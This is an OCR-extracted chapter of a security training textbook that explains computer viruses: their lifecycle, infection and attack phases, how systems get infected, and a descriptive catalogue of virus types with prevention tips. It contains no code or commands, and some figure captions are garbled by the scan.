Introduction to Viruses

u A virus is a self-replicating program that produces its own copy by attaching Itself to another program, computer boot sector
or document
ll Viruses are generally transmitted through file downloads, infected disk/flash drives, and as email attachments
J Indications of a virus attack include constant antivirus aJerts, suspicious hard drive activity, lack of storage space, unwanted

•
pop-up wlndows, etc.

Characteristics ofViruses Purvose of Creating Viruses

& Infect other programs e Inflict damage on competitors
& Financial benefits
;; Transform themselves
8 vandalism
e Encrypt themselves 8 Play pranks
& Research projects
8 Alterdata
e Cyber terrorism
e Corrupt files and programs e Distribute po1itica1 messages
ft Damage networks or computers
& Self-replicate & Gain remote access to a victim's computer

Introduction to Viruses

Viruses are the scourge of modern computing. Computer viruses have the potential to wreak
havoc on both business and personal computers.The lifetime of a virus depends on its ability to
reproduce itself. Therefore, attackers design every virus code such that the virus replicates
itself n times.
A computer virus is a self-replicating program that produces its code by attaching copies of
itself to other executable code and operates without the knowledge or consent of the user. Like
a biological virus, a computer virus is contagious and can contaminate other files; however,
viruses can infect external machines only with the assistance of computer users.
Some viruses affect computers as soon as their code is executed; other viruses remain dormant
until a pre-determined logical circumstance is met. Viruses infect a variety of files, such as
overlay files (.OVL) and executable files (.EXE, .SYS, .COM, or .BAT). They are transmitted
through file downloads, infected disk/flash drives, and email attachments.
Characteristics of Viruses
The performance of a computer is affected by a virus infection. This infection can lead to data
loss, system crash, and file corruption.
Some of the characteristics of a virus are as follows:
• Infects other programs

i Transforms itself
• Encrypts itself
• Alters data
 • Corrupts files and programs
• Replicates itself
Purpose of Creating Viruses
Attackers create viruses with disreputable motives. Criminals create viruses to destroy a
company's data, as an act of vandalism, or to destroy a company's products; however, in some
cases, viruses aid the system.
An attacker creates a virus for the following purposes:
• Inflict damage on competitors
• Realize financial benefits
• Vandalize intellectual property
• Play pranks
• Conduct research
• Engage in cyber-terrorism
• Distribute political messages
• Damage network or computers
■ Gain remote access to the victim's computer
Indications of Virus Attack
Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a
virus by interrupting the regular flow of a process or a program. However, not all bugs created
contribute toward attacking the system; they may be merely false positives. For example, if the
system runs slower than usual, one may assume that a virus has infected the system; however,
the actual reason might be program overload.
An effective virus tends to multiply rapidly and may infect some machines in a short period.
Viruses can infect files on the system, and when such files are transferred, they can infect
machines of other users who receive them. A virus can also use file servers to infect files.
When a virus infects a computer, the victim or user will be able to identify some indications of
the presence of virus infection.
Some indications of computer virus infection are as follows:
• Processes require more resources and time, resulting in degraded performance
• Computer beeps with no display
• Drive label changes and OS does not load
• Constant antivirus alerts
• Computer freezes frequently or encounters an error such as BSOD
• Files and folders are missing
• Suspicious hard drive activity
• Browser window "freezes"
• Lack of storage space
• Unwanted advertisements and pop-up windows
 Stages of Virus Lifecycle

I Design Developing virus code using programming languages or construction kits

Replication Virus replicates itself for a period within the target system and then spreads itself

l
I
Launch It gets activated when the user performs certain actions such as running infected programs

Detection A virus is Identified as a threat infecting target systems

Incorporation Antivirus software developers assimilate defenses against the virus

Execution of the
Users install antlvirus updates and eliminate the virus threats
damage routine

Stages of Virus Lifecycle

The virus lifecycle includes the following six stages from origin to elimination.
1. Design: Development of virus code using programming languages or construction kits.

2. Replication: The virus replicates for a period within the target system and then spreads
itself.

3. Launch: The virus is activated when the user performs specific actions such as running
an infected program.
4. Detection: The virus is identified as a threat infecting target system.
5. Incorporation: Antivirus software developers assimilate defenses against the virus.
6. Execution of the damage routine: Users install antivirus. updates and eliminate the virus
threats.
 Working of Viruses

Infection Phase Attaclt Phase

In the infection phase, the virus replicates Itself and Viruses are programmed with trigger events to
attaches to a .exe file in ihe system activate and corrupt systems

r
Some viruses infect each time they are run,. and others
Before After infect only when a certain predefined condition Is met

l II I
Infection Infection such as a user's specific task, a day, time, or a specific
event
.EXE File .EXE File
Unfra.gmented File Before Attack

. ..[IJ . . . ..
File: A. File: 8

-
File Header

-
ftle Header

\l J
Page: 1 Page: 2 Page: '3 Page: 1 Page: 2 Page: 3

�f :r.... ,..CJD . .. ....J

I (. . . � t............ 1-
Sta t of P1C1gr11m t
r
..exe � ••,
r .....,...
m I !
=............
£nd of Program :
Oean File Fragmented Due to Virus Attack
Elido4P,�m Virus Jum .,...: V1rus
File Infected �

� ................................,':'
Page: 3 Page: 1 Page: 3 Page: 2 Page: Z
<lie File: B File:A File: 8 File:A
I fi !�:-A File; 8
_
.. ..................................... ........................................
, ..

Working of Viruses
Viruses can attack a target host's system using a variety of methods. They can attach
themselves to programs and transmit themselves to other programs through specific events.
Viruses need such events to take place, as they cannot self-start, infect hardware, or transmit
themselves using non-executable files. "Trigger" and "dir-ect attack" events can cause a virus to
activate and infect the target system when the user triggers attachments received through
email, websites, malicious advertisements, flashcards, pop-ups, and so on. The virus can then
attack the system's built-in programs, antivirus software, data files, system startup settings, etc.
Viruses have two phases: the infection phase and the attack phase.
• Infection Phase
Programs modified by a virus infection can enable virus functionalities to run on the
system. The virus infects the target system after it is triggered and becomes active upon
the execution of infected programs, because the program code leads to the virus code.
The two most important factors in the infection phase of a virus are as follows:
o Method of infection
o Method of spreading
A virus infects a system in the following sequence:
o The virus loads itself into memory and checks for an executable on the disk.
o The virus appends malicious code to a legitimate program without the permission or
knowledge of the user.
o The user is unaware of the replacement and launches the infected program.
o The execution of the infected program also infects other programs in the system.
o The above cycle continues until the user realizes that there is an anomaly in the
system.
Apparently, the user unknowingly triggers and executes the virus for it to function.
There are many ways to execute programs while the computer is running. For example,
if the user installs any software tool, the setup program calls various built-in sub­
programs during extraction. If a virus program already exists, it can be activated with
this type of execution, and the virus can also infect additional setup programs.
Specific viruses infect in different ways, such as
o A file virus infects by attaching itself to an executable system application program.
Potential targets for virus infections are as follows:
• Source code
• Batch files
• Script files
o Boot sector viruses execute their code before the target PC is booted.
Viruses spread in a variety of ways. There are virus programs that infect and keep
spreading every time the user executes them. Some virus programs do not infect
programs when first executed. They reside in a computer's memory and infect programs
later. Such virus programs wait for a specified trigger event to spread at a later stage.
Therefore, it is difficult to recognize which event might trigger the execution of a
dormant virus. As illustrated in the figure below, the.EXE file's header, when triggered,
executes and starts running the application. Once this file is infected, any trigger event
from the file's header can activate the virus code along with the application program
immediately after executing it.
The most popular methods by which a virus spreads are as follows:
o Infected files: A virus can infect a variety of files.
o File-sharing servic.es: A virus can take advantage of file servers to infect files. When
unsuspecting users open the infected files, their machines also become infected.
o DVDs and other storage media: When infected storage media such as DVDs, flash
drives, and portable hard disks are inserted into a clean system, the system gets
infected.
o Malicious attachments and downloads: A virus spreads if a malicious attachment
sent via email is opened or when apps are downloaded from untrusted sources.
 r__
Before After
Infection Infection

.EXE F eH .EXE File

I:
_ _ _ _ _..,

File Header File Header

I IP I-.. .
l:J
Clean
File
'· • • • � Start of Program ; �►Start of Program

. .. •• Virus Jump ◄!··

;
End of Program
I -�,�i 1
�
Virus
Infected
File

Figure 7.34: Infection Phase

• Attack Phase

Once viruses spread throughout the target system, they start corrupting the files and
programs of the host system. Some viruses can trigger and corrupt the host system only
after the triggering event is activated. Some viruses have bugs that replicate themselves
and perform activities such as deleting files and increasing session time. Viruses corrupt
their targets only after spreading as intended by their developers.
Most viruses that attack target systems perform the following actions:
o Delete files and alter the content of data files, slowing down the system
o Perform tasks not related to applications, such as playing music and creating
animations
Unfragmented File Before Attack
File: A File: B

I Page: 1 Page: 2 Page:3 Page: 1 Page: 2 Page: 3

.. ............A.. . .. ..........A..
File Fragmented Due to Virus .Attack

Page: 1 Page: 3 Page: 1 Page:3 Page: 2 Page: 2

file: A File: B File: B File: A File: B File: A

.. ........................................................
• ,t.
...................�.
•I••••••• 0 • •• •• ■ • • • • • • • • • • ♦• •• 0 •• ..

Figure 7.35: Attack Phase

The figure shows two files, A and B. Before the attack, the two files are located one after
the other in an orderly manner. Once a virus code infects the file, it alters the position of
the files placed consecutively, leading to inaccuracy in file allocations and causing the
system to slow down as the user tries to retrieve the file·s.
In the attack phase:
o Viruses execute upon triggering specific events
o Some viruses execute and corrupt via built-in bug programs after being stored in the
host's memory
o The latest and most advanced viruses conceal theiir presence, attacking only after
thoroughly spreading through the host
 How does a Computer Get Infected by Viruses?

D When a user accepts files and downloads

without properly checking the source
- Ii.I
Not run'l1ing the latest antlvirus application

6 Opening infected e-mail attachments

J �
g Clicking malicious online ads
�

I] In.stalling pirated software fJ Using portable media

B Not updating and not in.stalling new versions

of plug-ins m Connecting to untrusted networks

Ii -�· - Cop,r+llll (Illy ft-CMuf AIIF:ljftn.ltncl'V'C'd ll:c;trntllult10111SSU!fflyl'rn�

How does a Computer Get Infected by Viruses?

To infect a system, first, a virus has to enter it. Once the user downloads and installs the virus
from any source and in any form, it replicates itself to other programs. Then, the virus can
infect the computer in various ways, some of which are listed below:
• Downloads: Attackers incorporate viruses in popular software programs and upload
them to websites intended for download. When a user unknowingly downloads this
infected software and installs it, the system is infected.
• Email attachments: Attackers usually send virus-infected files as email attachments to
spread the virus on the victim's system. When the victim opens the malicious
attachment, the virus automatically infects the system.
• Pirated software: Installing cracked versions of software (OS, Adobe, Microsoft Office,
etc.) might infect the system as they may contain viruses.
• Failing to install security software: With the increase in security parameters, attackers
are designing new viruses. Failing to install the latest antivirus software or regularly
update it may expose the computer system to virus attac, ks.
• Updating software: If patches are not regularly installed when released by vendors,
viruses might exploit vulnerabilities, thereby allowing an attacker to access the system.
• Browser: By default, every browser comes with built-in security. An incorrectly
configured browser could result in the automatic running of scripts, which may, in turn,
allow viruses to enter the system.
• Firewall: Disabling the firewall will compromise the security of network traffic and invite
viruses to infect the system.
• Pop-ups: When the user clicks any susp1c1ous pop-up by mistake, the virus hidden
behind the pop-up enters the system. Whenever the user turns on the system, the
installed virus code will run in the background.
• Removable media: When a healthy system is associated with virus-infected removable
media (e.g., CD/ DVD, USB drive, card reader), the virus spreads the system.
• Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or
permitting a file sharing program that is accessed openly will allow a virus to take over
the device.
• Backup and restore: Taking a backup of an infected f ile and restoring it to a system
infects the system again with the same virus.
• Malicious online ads: Attackers post malicious online ads by embedding malicious code
in the ads, also known as malvertising. Once users click these ads, their computers get
infected.
• Social Media: People tend to click on social media sites, including malicious links shared
by their contacts, which can infect their systems.
 Types of Viruses
'-' Viruses are categories according to their functioning and targets
J Some of the example includes:

System or Boot Sector Virus Polymorphic Virus Web Scripting Virus

J
File and Multipartite Virus Metamorphic Virus Email and Armored Virus
J
Macro and Cluster Virus Overwriting File or Cavity Virus Add-on and Intrusive Virus
'--

Stealth/Tunneling Virus Companion/camouflage Virus Oirect Action or Transient Virus

Encryption Viru.s Shell and File Extension Virus Terminate & Stay Resident Virus

Sparse lnfector Virus FAT and Logic Bomb Virus

Types of Viruses
Computer viruses are malicious software programs written by attackers to gain unauthorized
access to a target system. Thus, they compromise the security of the system as well as its
performance. For any virus to corrupt a system, it has to first associate its code with executable
code.

It is important to understand how viruses:

• Add themselves to the target host's code
• Choose to act upon the target system
Viruses are categories according to their functioning and targets. Some of the most common
types of computer viruses that adversely affect the security of systems are listed below:
1. System or Boot Sector Virus
2. File Virus
3. Multipartite Virus
4. Macro Virus
s. Cluster Virus
6. Stealth/Tunneling Virus
7. Encryption Virus
8. Sparse lnfector Virus
9. Polymorphic Virus
 10. Metamorphic Virus
11. Overwriting File or Cavity Virus
12. Companion Virus/Camouflage Virus
13. Shell Virus
14. File Extension Virus
15. FAT Virus
16. Logic Bomb Virus
17. Web Scripting Virus
18. Email Virus
19. Armored Virus
20. Add-on Virus
21. Intrusive Virus
22. Direct Action or Transient Virus
23. Terminate and Stay Resident Virus (TSR)
System or Boot Sector Viruses

The most common targets for a virus are the system sectors, which include the master boot
record (MBR) and the DOS boot record system sectors. An 05 executes code in these areas
while booting. Every disk has some sort of system sector. MBRs are the most virus-prone zones
because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during
system booting. This is a crucial point of attack for viruses.
The system sector consists of only 512 bytes of disk space. Therefore, system sector viruses
conceal their code in some other disk space. The primary carriers of system or boot sector
viruses are email attachments and removable media (USB drives). Such viruses reside in
memory. Some sector viruses also spread through infected files; these are known as
multipartite viruses.
A boot sector virus moves MBR to another location on the hard disk and copies itself to the
original location of MBR. When the system boots, first, the virus code executes and then
control passes to the original MBR.
 Before Infection

---MBR---+
7
After Infection

.....-....,--.....,.
•�.....a:.-.ui : .......... ..............

+- Virus Code� +---MBR---�

Figure 7.36: Working of system and boot sector virus

• Virus Removal
System sector viruses create the illusion that there is no virus on the system. One way to
deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac,
because Windows is more prone to such attacks. Linux and Macintosh have built-in
safeguards for protection against these viruses. The other approach is to periodically
perform antivirus checks.
File Viruses
File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ,
PRG, MNU, and BAT files. File viruses can be direct-action (non-resident) or memory-resident
viruses.
File viruses insert their code into the original file and infect executable files. Such viruses are
numerous, albeit rare. They infect in a variety of ways and are found in numerous file types.
The most common type of file virus operates by identifying the file type it can infect most
easily, such as that with filenames ending in .COM or .EXE. Dur:ing program execution, the virus
executes along with program files to infect more files. Overwriting a virus is not easy, as the
overwritten programs no longer function properly. These viruses tend to be found immediately.
Before Inserting their code Into a program, some file viruses save the original instructions and
allow the original program to execute, so that everything appears normal.
File viruses hide their presence using stealth techniques to reside in a computer's memory in
the same way as system sector viruses. They do not show any increase in file length while
performing directory listing. If a user attempts to read the file, the virus intercepts the request,
and the user gets back his original file. File viruses can infect many file types, as a wide variety
of infection techniques exist.

Attacker
Figure 7.37: Working of file virus
Multipartite Viruses
A multipartite virus (also known as a multipart virus or hybrid virus) combines the approach of
file infectors and boot record infectors and attempts to simultaneously attack both the boot
sector and the executable or program files. When the virus infects the boot sector, it will, in
turn, affect the system files and vice versa. This type of virus re-infects a system repeatedly if it
is not rooted out entirely from the target machine. Some examples of multipartite viruses
include Invader, Flip, and Tequila.
Macro Viruses
Macro viruses infects Microsoft Word or similar applications by automatically performing a
sequence of actions after triggering an application. Most macro viruses are written using the
macro language Visual Basic for Applications (VBA), and they infect templates or convert
infected documents into template files while maintaining their appearance of common
document files.
Macro viruses are somewhat less harmful than other viruses. They usually spread via email.
Pure data files do not allow the spreading of viruses, but sometimes, the average user, due to
the extensive macro languages used in some programs, easily overlooks the line between a
data file and an executable file. In most cases, just to make things easy for users, the line
between a data file and a program starts to blur only when the default macros are set to run
automatically every time the data file is loaded. Virus writers can exploit universal programs
with macro capability, such as Microsoft Word, Excel, and other Office programs. Windows
Help files can also contain macro code.

Infects Macro Enabled Documents

.....��·�········�······�····���.,,..
Attacker User
Figure 7.38: Working of a macro virus

Cluster Viruses
Cluster viruses infect files without changing the file or planting additional files. They save the
virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk
read point to the virus code instead of the actual program. Even though the changes in the
directory entry may affect all the programs, only one copy of the virus exists on the disk.
A cluster virus, e.g., Dir-2, first launches itself when any program starts on the computer
system, and control is then passed to the actual program.
This virus infection leads to severe problems if the victim does not know its exact location. If it
infects memory, it controls access to the directory structure on the disk.
If the victim boots from a clean floppy disk and then runs a utility such as CHKDSK, the utility
reports a serious problem with the cross-linked file on the disk. Such utilities usually offer to
correct the problem. If the offer is accepted, the virus infects all the executable files and results
in the loss of original content, or all files might appear to be of the same size.
Stealth Viruses/Tunneling Viruses
These viruses try to hide from antivirus programs by actively altering and corrupting the service
call interrupts while running. The virus code replaces the requests to perform operations with
respect to these service call interrupts. These viruses state false information to hide their
presence from antivirus programs. For example, a stealth virus hides the operations that it
modified and gives false representations. Thus, it takes over portions of the target system and
hides its virus code.
A stealth virus hides from antivirus software by hiding the original size of the file or temporarily
placing a copy of itself in some other system drive, thus replacing the infected file with the
uninfected file that is stored on the hard drive.
In addition, a stealth virus hides the modifications performed by it. It takes control of the
system's functions that read files or system sectors. When another program requests
information that has already modified by the virus, the stealth virus reports that information to
the requesting program instead. This virus also resides in memory.
To avoid detection, these viruses always take over system functions and use them to hide their
presence.
One of the carriers of stealth viruses is the rootkit. Installing a rootkit results in such a virus
attack because a Trojan installs the rootkit and is thus capable of hiding any malware.

0..
Give me the 5y5tem Hides Infected
file tcplp.sys to scan TCP·IP.SYS
···················> - ·················►

Antivirus Software VIRUS

: Here you go -
. . . . ....... . ◄ .........•
L..J
Original TCPIP.SYS

Figure 7 .. 39: Working of .stealth virus/tunneling virus

• Virus Removal
o Always perform a cold boot {boot from write-protected CD or DVD)
o Never use DOS commands such as FDISK to fix the virus
o Use antivirus software
Encryption Viruses
Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware,
codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an
encrypted copy of the virus and a decryption module. The decryption module remains constant,
whereas the encryption makes use of different keys.
An encryption key consists of a decryption module and an encrypted copy of the code, which
enciphers the virus. When the attacker injects the virus into the target machine, the decryptor
will first execute and decrypt the virus body. Then, the virus body executes and replicates or
becomes resident in the target machine. The replication process ls successfully accomplished
using the encryptor. Each virus-infected file uses a different key for encryption. These viruses
employ XOR on each byte with a randomized key. The decryption technique employed is "x," or
each byte with a randomized key is generated and saved by the root virus.
Encryption viruses block access to target machines or provide victims with limited access to the
system. They use encryption to hide from virus scanners. The virus scanner cannot detect the
encryption virus using signatures, but it can detect the decrypting module.

... ••• ••• • • • • • ■ ••••••••• ➔ Encryption

.. .·.
••♦ Encryption key 1 Virus 1

Encryption key 2 Encryption

..........................................................► Virus 2

.. .
Virus Code .
\
·......................
Encryption key 3
�
Encryption
Virus 3

Figure 7.40: Working of encryption virus

Sparse lnfector Viruses

To spread infection, viruses typically attempt to hide from antivirus programs. Sparse infector
viruses infect less often and try to minimize their probability of discovery. These viruses infect
only occasionally upon satisfying certain conditions or infect only those files whose lengths fall
within a narrow range.
The sparse infector virus works with two approaches:
• Replicates only occasionally (e.g., every tenth program executed or on a particular day
of the week)
• Determines which file to infect based on certain conditions (e.g., infects target flies with
a maximum size of 128 kb)
The diagram below show the working of a sparse infector virus.
The attacker sends a sparse infector virus to the target machine and sets a wakeup call for the
vin.is to exer.ute on the 15th rl,;1y of every month. This strategy m<1kes it difficult for the <1ntivirus

A
program to detect the virus, thus allowing the virus to infect the target machine successfully.

Wake up on 1s lh of
every month and execute code
... ..c[••······························
f!l!!fl
Figure 7.41: Working of sparse infecter virus
Polymorphic Viruses
Such viruses infect a file with an encrypted copy of a polymorphic code already decoded by a
decryption module. Polymorphic viruses modify their code for each replication to avoid
detection. They accomplish this by changing the encryption module and the instruction
sequence. Polymorphic mechanisms use random number generators in their implementation.
The general use of the mutation engine is to enable polymorphic code. The mutator provides a
sequence of instructions that a virus scanner can use to op1i:imize an appropriate detection
algorithm. Slow polymorphic code prevents antivirus professionals from accessing the code. A
simple integrity checker detects the presence of a polymorphic virus in the system's disk.
A polymorphic virus consists of three components: the encrypted virus code, the decryptor
routine, and the mutation engine. The function of the decryptor routine is to decrypt the virus
code. It decrypts the code only after taking control of the computer. The mutation engine
generates randomized decryption routines. Such decryption routines vary whenever the virus
infects a new program.
The polymorphic virus encrypts both the mutation engine and the virus code. When the user
executes a polymorphic-virus-infected program, the decryptor routine takes complete control
of the system, after which it decrypts the virus code and the mutation engine. Next, the
decryption routine transfers the system control of the virus, which locates a new program to
infect. In the Random Access Memory (RAM), the virus makes a replica of itself as well as the
mutation engine. Then, the virus instructs the encrypted mutation engine to generate a new
randomized decryption routine, which can decrypt the virus. Here, the virus encrypts the new
copies of both the virus code and the mutation engine. Thus, this virus, along with the newly
encrypted virus code and encrypted mutation engine (EME), appends the new decryption
routine to a new program, thereby continuing the process.
Polymorphic viruses running on target systems are difficult to detect due to the encryption of
the virus body and the changes in the decryption routine each time these viruses infect. It is
difficult for virus scanners to identify these viruses, as no two infections look alike.

Encrypled Mutation "" ••

L..... e....... .
0 """"•• ••• •• • •• �

Engine IE E)
£ncrvptod M'u�ttOn
Englne : .. • • • ............ :
! (1)$ltuct :

• • .............�.;,:·;;,;,:;;,:•,��;•....... I�=====�I
lnstr\ld ;
to cn�ate ! ! l'o crute :
£ncrvs,ted ViruJ
•···········..... ➔ newDR ! � newEME

F=7
Code DKryptor routine !...................
decrypt$ vfr1.1t codo
and mutation
Decrypt°' Routine en,clne NewVlrus

e
with new key

Vl1Us Does the- Damage New Polymorphic

Virus
US-4!r Runs an l.nlected Proeram RAM

Figure 7.42: Working of polymorphic virus

Metamorphic Viruses
Metamorphic viruses are programmed such that they rewrite themselves completely each time
they infect a new executable file. Such viruses are sophisticated and use metamorphic engines
for their execution. Metamorphic code reprograms itself. It is translated into temporary code (a
new variant of the same virus but with different code) and then converted back into the original
code. This technique, in which the original algorithm remains intact, is used to avoid pattern
recognition by antivirus software. Metamorphic viruses are more effective than polymorphic
viruses.
The transformation of virus bodies ranges from simple to complex, depending on the technique
used. Some techniques used for metamorphosing viruses are as follows:
• Disassembler
• Expander
• Permutator
• Assembler
Virus bodies are transformed in the following steps:
1. Inserts dead code
2. Reshapes expressions
3. Reorders instructions
4. Modifies variable names
s. Encrypts program code
6. Modifies program control structure

variant l variant 2 variant 3

'--------'
• ·• · · ·>- Metamorphic Engine This diagram depicts metamorphic malware variants with recorded code

Figure 7 .43: Working of metamorphic virus

Commonly known metamorphic viruses are as follows:

• Win32/Simile
The intruder programs this virus in assembly language to target Microsoft Wir1dows.
This process is complicated and generates almost 90% of the virus code.
 • Zmist
Zmist is also known as Zombie. Mistfall was the first virus to use the technique called
"code integration." This code inserts itself into other code, regenerates the code, and
rebuilds the executable.
Overwriting File or Cavity Viruses
Some programs have empty spaces in them. Cavity viruses, also known as space fillers,
overwrite a part of the host file with a constant (usually nulls), without increasing the length of
the file while preserving its functionality. Maintaining a constant file size when infecting allows
the virus to avoid detection. Cavity viruses are rarely found due to the unavailability of hosts
and code complexity.
A new design of a Windows file, called the Portable Executable (PE), improves the loading
speed of programs. However, it leaves a particular gap in the file while it is being executed,
which can be used by the cavity virus to insert itself. The most popular virus family in this
category is the CIH virus (known as Chernobyl or Spacefiller).

Content in the file before infection Content in the file after infection
Sales and marketing management is the Null Null. Null Null N\111 Null Null
leading authority for executives in the sales Null Nul1 Null Null N\111 N\111 Null
Null Null. Null Null N\111 N\111 Null
and marketing management industries. Null Null Null Null N\111 N\111. Null
The suspect, Desmond Turner, surrendered Null Null Null Null N\111 N\111 Null

B · · · · · · · · · · · · · · · · · · · · · · · · · · ·►f.
to authorities at a downtown Indianapolis Nul.l Null Null Null N\111 Null N\111
fast-food restaurant Null Null Null Null N\111 Null

Original File Infected file

Size: 45 KB Size: 45 KB

Figure 7.44: Working of overwriting file or cavity virus

Companion/Camouflage Viruses
The companion virus stores itself with the same filename as the target program file. The virus
infects the computer upon executing the file, and it modifies the hard disk data. Companion
viruses use DOS to run COM files before the execution of EXE files. The virus installs an identical
COM file and infects EXE files.
This is what happens. Suppose that a companion virus is executing on the PC and decides that it
is time to infect a file. It looks around and happens to find a file called notepad.exe. It now
creates a file called notepad.com, containing the virus. The virus usually plants this file in the
same directory as the .exe file; however, it can also place it in any directory on the DOS path. If
you type notepad and press Enter, DOS executes notepad.com instead of notepad.exe (in
sequence, DOS will execute COM, then EXE, and then BAT files with the same root name, if they
are all in the same directory). The virus executes, possibly infecting more files, and then loads
and executes notepad.exe. The user would probably fail to notice that something is wrong. It is
easy to detect a companion virus just by the presence of the extra COM file in the system.
 Virus Infects
the system with a file
E]
notepad.com and saves it in
•-
··························> : ··········➔
c:\winnt\system32 directory

Attacker Notepad.exe Notepad.com

Figure 7.4S: Working of companion virus/ camouflage virus

Shell Viruses
The shell virus code forms a shell around the target host program's code, making itself the
original program with the host code as its sub-routine. Nearly all boot program viruses are shell
viruses.

Before Infection

• � Original Program �

After Infection
:···················ey,
--1
+-
-1 Virus Code� � Original Proiram �

Figure 7.46: Working of shell virus

File Extension Viruses

File extension viruses change the extensions of files. The extension .TXT is safe as it indicates a
pure text file. With extensions turned off, if someone sends you a file named BAD.TXT.VBS, you
will only see BAD.TXT. If you have forgotten that extensions are turned off, you might think that
this is a text file and open it. It actually ls an executable Visual Basic Script virus file and could
cause severe damage.
The guidelines to secure files against such virus infection are as follows:
• Turn off "Hide file extensions" in Windows (Go to Control Panel ➔ Appearance and
Personalization ➔ Show hldden files and folders ➔ View tab ➔ Uncheck Hide
extensions for known file types).
• Scan all the files in the system using robust antivirus software; this requires a substantial
amount of time.
 File Explorer Options X

General View Seateh

Folder views

... -.
You can apply this view (such as Details or Icons) lo
al folders or this type .

Reset Folders

Advanced settings:
� and Folders
0 �Wa"fS show icons, never thumbnails
0 �Wa"fS show menus
0 Display fie icon on thumbnails
0 Display file size nom,ation in folder�
0 Display the ful path in the title bar
®
Hidden mes and f�
Don\ show hidden files. folders. or drives
0 Show hidden files. folders. and drives
drives
�- o, I - • '

merge cOraa V

L Restore- Defaults

OK Cancel Apply

Figure 7.47: Screenshot displaying Folder Options Window

FAT Viruses
A FAT virus is a computer virus that attacks the File Allocation Table (FAT), a system used in
Microsoft products and some other types of computer systems to access the information
stored on a computer. By attacking the FAT, a virus can cause severe damage to a computer.
FAT viruses can work in a variety of ways. Some are designed to embed themselves into files so
that when the FAT accesses the file, the virus is triggered. Others may attack the FAT directly.
Many are designed to overwrite files or directories, and material on a computer can lost
permanently. If a FAT virus is sufficiently powerful, it can render a computer unusable in
addition to destroying data, forcing a user to reformat the computer.
Essentially, a FAT virus destroys the index, thereby making it impossible for a computer to
locate files. The virus can spread to files when the FAT attempts to access them, corrupting the
entire computer eventually. FAT viruses often manifest in the form of corrupted files, with
users noting that files are missing or inaccessible. The FAT architecture itself can also be
changed; e.g., a computer that should be using the FAT32 protocol might abruptly say that it is
using FAT12.
Logic Bomb Viruses
A logic bomb is a virus that is triggered by a response to an event, such as the launching of an
application or when a specific date/time is reached, where it involves logic to execute the
trigger.
For example, cyber-criminals use spyware to covertly install a keylogger on your computer. The
keylogger can capture keystrokes, such as usernames and passwords. The logic bomb is
designed to wait until you visit a website that requires you to log in with your credentials, such
as a banking site or social network. Consequently, the logic bomb will be triggered to execute
the keylogger, capture your credentials, and send them to a remote attacker.
When a logic bomb is programmed to execute on a specific date, it is referred to as a time
bomb. Time bombs are usually programmed to set off when important dates are reached, such
as Christmas and Valentine's Day.
Web Scripting Viruses
A web scripting virus is a type of computer security vulnerability that breaches your web
browser security through a website. This allows attackers to inject client-side scripting into the
web page. It can bypass access controls and steal information from the web browser. Web
scripting viruses are usually used to attack sites with large populations, such as sites for social
networking, user reviews, and email. Web scripting viruses can propagate slightly faster than
other viruses. A typical version of web scripting viruses is DDoS. It has the potential to send
spam, damage data, and defraud users.
There are two types of web scripting viruses: non-persistent and persistent. Non-persistent
viruses attack you without your knowledge. In the case of a persistent virus, your cookies are
directly stolen, and the attacker can hijack your session, which allows the attacker to
impersonate you and cause severe damage.
• Prevention
The best ways to prevent these viruses and exploits are by safely validating untrusted
HTML inputs, enforcing cookie security, disabling scripts, and using scanning services
such as an antivirus program with real-time protection for your web browser. It is also
beneficial to avoid unknown websites and use World of Trust to ensure that a site is
safe. You would notice if you are infected with a web scripting virus if your searches are
linked elsewhere and the background or homepage changes. The computer runs slowly
and sluggishly, and programs may close randomly. Modern-day browsers have add-ons
such as AdBlocker Plus, which allow users to prevent scripts from being loaded.
E-mail Viruses
An e-mail virus refers to computer code sent to you as an e-mail attachment, which if activated,
will result in some unexpected and L1sually harmful effects, such as destroying specific files on
your hard disk and causing the attachment to be emailed to everyone in your address book.
Email viruses perform a wide variety of activities, from creating pop-ups to crashing systems or
stealing personal data. Such viruses also vary in terms of how they are presented. For example,
a sender of an email virus may be unknown to a user, or a subject line may be filled with
nohsense. In other cases, a hacker may cleverly disguise an email to appear as if it is from a
trusted or known sender.
To avoid email virus attacks, you should never open (or double-click on) an e-mail attachment
unless you know who sent it and what the attachment contains; in addition, you must install
and use antivirus software to scan any attachment before you open it.
Armored Viruses
Armored viruses are viruses that are designed to confuse or trick deployed antivirus systems to
prevent them from detecting the actual source of the infection. These viruses make it difficult
for antivirus programs to trace the actual source of the attack. They trick antivirus programs by
showing some other location even though they are actually on the system itself.
The following basic techniques are adopted by armored viruses:
• Anti-disassembly
Anti-disassembly is a technique that uses specially crafted code or data in a program to
produce an incorrect program listing by disassembly analysis tools.
• Anti-debugging
Anti-debugging techniques are used to ensure that the program is not running under
the debugger. This can slow down the process of reverse engineering, but ft cannot be
prevented.
• Anti-heuristics
Anti-heuristics are used in machine code to prevent heuristic analysis, and they rely on
the program's ability to protect itself from programmer and debugger intervention.
• Anti-emulation
Anti-emulation techniques are used to avoid dynamic analysis by fingerprinting the
emulated system environment; they can also secure intellectual property against
emulation-assisted reverse engineering.
• Anti-goat
Anti-goat techniques use heuristic rules to detect possible goat files such as a virus that
cannot infect a file if it is too small or if it contains a large amount of do-nothing
instructions. Anti-goat viruses require more time for analysis.
Add-on Viruses
Add-on viruses append their code to the host code without making any changes to the latter or
relocate the host code to insert their code at the beginning.
 Original Program

T Original Program

Original Program
: JUMP � • :
I . .

t.............· .........·· ....· ......· ....· .....··..·· ......· ..........· ....·· .....· .. • .... JUMP,....... t
Figure 7.48: Working of add-on virus

Intrusive Viruses
Intrusive viruses overwrite the host code completely or partly with the viral code.
Original Program

Original Program

Figure 7.49: Working of intrusive virus

Direct Action or Transient Viruses

Direct action or transient viruses transfer all controls of the host code to where it resides in the
memory. It selects the target program to be modified and corrupts it. The life of a transient
virus is directly proportional to the life of its host. Therefore, transient virus executes only upon
the execution of its attached program and terminates upon the termination of its attached
program. At the time of execution, the virus may spread to other programs. This virus is
transient or direct, as it operates. only for a short period and goes directly to the disk to search
for programs to infect.
Terminate and Stay Resident (TSR) Viruses
A terminate and stay resident (TSR) virus remains permanently in the target machine's memory
during an entire work session, even after the target host's program is executed and terminated.
